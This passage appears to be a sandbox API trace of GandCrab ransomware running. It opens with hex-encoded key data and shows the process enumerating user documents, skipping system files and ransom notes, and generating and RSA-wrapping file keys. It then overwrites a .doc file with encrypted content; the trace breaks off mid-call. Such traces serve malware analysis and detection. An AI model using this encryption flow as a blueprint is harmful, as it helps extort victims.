\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0089.709] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0089.710] CloseHandle (hObject=0x2b4) returned 1 [0089.710] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.710] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.710] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x23, wMilliseconds=0x15)) [0089.710] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.711] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0089.711] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0089.711] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\d2ca4a09d2ca4deb61a.lock") returned 80 [0089.711] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\ghze5qhkeiri\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0089.713] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.713] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.714] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\") returned 56 [0089.714] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\*" [0089.714] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x503638 [0089.714] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.714] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0089.714] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.714] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.714] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0089.714] lstrcmpW (lpString1="4KhSQHfpuUM.doc", lpString2=".") returned 1 [0089.714] lstrcmpW (lpString1="4KhSQHfpuUM.doc", lpString2="..") returned 1 [0089.714] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\", lpString2="4KhSQHfpuUM.doc" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\4KhSQHfpuUM.doc") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\4KhSQHfpuUM.doc" [0089.714] lstrlenW (lpString=".titwmvjl") returned 9 [0089.714] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\4KhSQHfpuUM.doc") returned 71 [0089.714] VirtualAlloc (lpAddress=0x0, dwSize=0xce, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.714] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\4KhSQHfpuUM.doc.titwmvjl") returned 80 [0089.714] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\4KhSQHfpuUM.doc") returned 71 [0089.714] lstrlenW (lpString=".doc") returned 4 [0089.714] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.715] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".doc ") returned 5 [0089.715] lstrcmpiW (lpString1=".doc", lpString2=".titwmvjl") returned -1 [0089.715] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.715] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\4KhSQHfpuUM.doc") returned 71 [0089.715] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\4KhSQHfpuUM.doc") returned 71 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="desktop.ini") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="autorun.inf") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="ntuser.dat") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="iconcache.db") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="bootsect.bak") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="boot.ini") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="ntuser.dat.log") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="thumbs.db") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="KRAB-DECRYPT.html") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="CRAB-DECRYPT.html") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="ntldr") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="NTDETECT.COM") returned -1 [0089.715] lstrcmpiW (lpString1="4KhSQHfpuUM.doc", lpString2="Bootfont.bin") returned -1 [0089.715] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\4KhSQHfpuUM.doc") returned 71 [0089.716] lstrlenW (lpString=".doc") returned 4 [0089.716] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.716] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".doc ") returned 5 [0089.716] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.716] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.716] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\4KhSQHfpuUM.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\ghze5qhkeiri\\4khsqhfpuum.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0089.716] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.717] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0089.717] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.717] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.717] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0089.718] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.719] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.719] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.719] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0089.719] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.719] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.719] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.719] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.719] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0089.720] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.721] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.721] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.721] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0089.721] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.721] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.721] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.721] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.721] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0089.722] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.722] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503378) returned 1 [0089.722] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.723] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0089.723] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.723] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0089.723] GetLastError () returned 0x0 [0089.723] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.723] CryptDestroyKey (hKey=0x503378) returned 1 [0089.723] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.723] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.723] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.723] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0089.724] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.725] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503838) returned 1 [0089.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.725] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0089.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.725] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0089.725] GetLastError () returned 0x0 [0089.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.725] CryptDestroyKey (hKey=0x503838) returned 1 [0089.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.726] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.726] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.726] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.726] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0xd1de, lpOverlapped=0x0) returned 1 [0089.732] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xffff2e22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.732] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd1de, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0xd1de, lpOverlapped=0x0) returned 1 [0089.745] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0089.747] VirtualFree (lpAddress=0x2650000, 